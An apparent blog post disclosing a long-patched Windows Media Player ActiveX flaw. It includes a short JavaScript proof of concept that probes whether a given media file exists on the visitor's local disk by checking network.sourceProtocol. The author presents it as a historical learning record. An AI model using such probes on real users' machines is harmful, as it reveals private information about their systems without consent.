Windows Media Player — Check If Local File Exists

The WMPlayer.ocx ActiveX object’s network.sourceProtocol property reveals whether a local file path exists and is loadable. Setting wmp.URL to a local path and checking sourceProtocol after a short delay returns "FILE" for existing files and an empty string for non-existent ones.

<script language="JavaScript">
var wmp = new ActiveXObject("WMPlayer.ocx");

function setSource(fileName)
{
    wmp.URL = fileName;
    setTimeout('checkSourceProtocol()', 1000);
}
function checkSourceProtocol()
{
    if (wmp.network.sourceProtocol.length > 0)
        alert("File Exists!!");
    else
        alert("File not found");
}
</script>

<input type="text" size="80"
       value="C:\Program Files\Common Files\microsoft shared\Stationery\Bears.jpg"
       id="fileName">
<input type="button" value="Check if Exists"
       onclick="setSource(document.getElementById('fileName').value)">

The file must be one that WMP can load (AVI, WMV, WMA, MP3, JPG, PNG, GIF, ICO, etc.) — executable or text files return false negatives. This allows an attacker to enumerate the presence of known media files on the local system.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE Undocumented Events — showmessage, propertysheet, MenuExtUnknown] :: [IE8 DoS — Access Violation in DevTools with Framed Feeds] >